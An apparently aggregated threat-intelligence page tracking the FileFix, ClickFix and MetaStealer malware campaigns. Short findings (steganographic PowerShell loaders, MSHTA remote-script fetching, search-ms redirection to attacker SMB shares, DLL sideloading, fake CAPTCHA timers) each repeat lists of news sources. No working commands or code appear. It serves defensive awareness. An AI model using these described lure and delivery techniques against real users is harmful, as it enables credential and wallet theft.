- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix campaign demonstrates an attacker testing and adapting their infrastructure.
  First reported: 16.09.2025 15:00 · 3 sources, 8 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix campaign has been observed in multiple countries, including the US, Philippines, Bangladesh, Tunisia, Dominican Republic, Germany, China, Peru, Nepal, and Serbia.
  First reported: 16.09.2025 15:00 · 3 sources, 7 articles. Sources:
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The phishing site used in the FileFix campaign has been translated into at least 16 different languages, indicating a global targeting strategy.
  First reported: 16.09.2025 15:00 · 3 sources, 7 articles. Sources:
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix technique was conceived by a red team researcher known as mr.d0x in mid-2022.
  First reported: 16.09.2025 15:00 · 3 sources, 7 articles. Sources:
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix campaign uses AI-generated images to conceal malicious payloads.
  First reported: 16.09.2025 15:00 · 3 sources, 7 articles. Sources:
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix campaign is considered the most mature and sophisticated to date, combining convincing phishing, tough code obfuscation, and robust steganography.
  First reported: 16.09.2025 15:00 · 3 sources, 7 articles. Sources:
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix campaign has a broader range of high-value targets compared to ClickFix due to its use of File Explorer.
  First reported: 16.09.2025 15:00 · 3 sources, 7 articles. Sources:
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix campaign is expected to see more attacks in the near future due to its effectiveness and novelty.
  First reported: 16.09.2025 15:00 · 3 sources, 7 articles. Sources:
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The FileFix attack uses a multilingual phishing site to trick users into executing a malicious command via the File Explorer address bar.
First reported: 16.09.2025 15:33 · 2 sources, 6 articles
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The FileFix attack leverages Bitbucket to host the malicious components, abusing a legitimate source code hosting platform to bypass detection.
First reported: 16.09.2025 15:33 · 2 sources, 6 articles
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The FileFix attack involves a multi-stage PowerShell script that downloads an image, decodes it into the next-stage payload, and runs a Go-based loader to launch StealC.
First reported: 16.09.2025 15:33 · 2 sources, 6 articles
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The FileFix attack uses advanced obfuscation techniques, including junk code and fragmentation, to hinder analysis efforts.
First reported: 16.09.2025 15:33 · 2 sources, 6 articles
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The FileFix attack is more likely to be detected by security products due to the payload being executed by the web browser used by the victim.
First reported: 16.09.2025 15:33 · 2 sources, 6 articles
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The FileFix attack demonstrates significant investment in tradecraft, with carefully engineered phishing infrastructure, payload delivery, and supporting elements to maximize evasion and impact.
First reported: 16.09.2025 15:33 · 2 sources, 6 articles
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The FileFix attack is more sophisticated than ClickFix, as it abuses a widely used browser feature instead of the Run dialog or Terminal app.
First reported: 16.09.2025 15:33 · 2 sources, 6 articles
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The FileFix attack has been observed in a campaign that uses a combination of fake support portals, Cloudflare CAPTCHA error pages, and clipboard hijacking to socially engineer victims into running malicious PowerShell code.
First reported: 16.09.2025 15:33 · 2 sources, 6 articles
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The FileFix attack has been observed using an AutoHotkey (AHK) script to profile the compromised host and deliver additional payloads, including AnyDesk, TeamViewer, information stealers, and clipper malware.
First reported: 16.09.2025 15:33 · 2 sources, 5 articles
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The FileFix attack has been observed using an MSHTA command pointing to a lookalike Google domain to retrieve and execute a remote malicious script.
First reported: 16.09.2025 15:33 · 2 sources, 5 articles
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MetaStealer malware is a commodity infostealer known for harvesting credentials and stealing files.
First reported: 17.09.2025 17:01 · 2 sources, 5 articles
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MetaStealer attack involves a fake Cloudflare Turnstile lure, the Windows search protocol, and an MSI package disguised as a PDF.
First reported: 17.09.2025 17:01 · 2 sources, 5 articles
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MetaStealer attack uses a Windows shortcut LNK file disguised as a PDF file to execute malicious commands.
First reported: 17.09.2025 17:01 · 2 sources, 5 articles
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MetaStealer attack involves a DLL sideloading technique using a legitimate SentinelOne executable.
First reported: 17.09.2025 17:01 · 2 sources, 5 articles
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MetaStealer attack uses a custom search query as part of the search-ms URI protocol to redirect victims to an attacker-controlled SMB share.
First reported: 17.09.2025 17:01 · 2 sources, 5 articles
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MetaStealer attack involves an MSI package containing a DLL and a CAB archive with additional malicious files.
First reported: 17.09.2025 17:01 · 2 sources, 5 articles
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MetaStealer attack uses a large binary protected with Private EXE Protector to evade detection.
First reported: 17.09.2025 17:01 · 2 sources, 5 articles
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MetaStealer attack targets crypto wallets and other sensitive information.
First reported: 17.09.2025 17:01 · 2 sources, 5 articles
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MetaStealer attack involves a multi-stage infection chain that includes a fake PDF lure to grab the victim's hostname.
First reported: 17.09.2025 17:01 · 2 sources, 5 articles
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MetaStealer attack uses a combination of social engineering and technical evasion techniques to deploy malware.
First reported: 17.09.2025 17:01 · 2 sources, 5 articles
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
ClickFix attacks now feature videos that guide victims through the self-infection process.
First reported: 06.11.2025 16:00 · 2 sources, 9 articles
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
A timer is used to pressure victims into taking risky actions.
First reported: 06.11.2025 16:00 · 2 sources, 8 articles
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The attacks automatically detect the operating system to provide the correct commands.
First reported: 06.11.2025 16:00 · 2 sources, 8 articles
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Push Security researchers have observed these changes in recent ClickFix campaigns.
First reported: 06.11.2025 16:00 · 2 sources, 6 articles
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The fake Cloudflare CAPTCHA verification challenge includes a one-minute countdown timer.
First reported: 06.11.2025 16:00 · 2 sources, 9 articles
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
The attacks are primarily promoted through malvertising on Google Search.
First reported: 06.11.2025 16:00 · 2 sources, 10 articles
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
Threat actors exploit known flaws on outdated WordPress plugins to compromise legitimate sites.
First reported: 06.11.2025 16:00 · 2 sources, 8 articles
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Threat actors use SEO poisoning tactics to rank malicious sites higher in search results.
First reported: 06.11.2025 16:00 · 2 sources, 8 articles
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
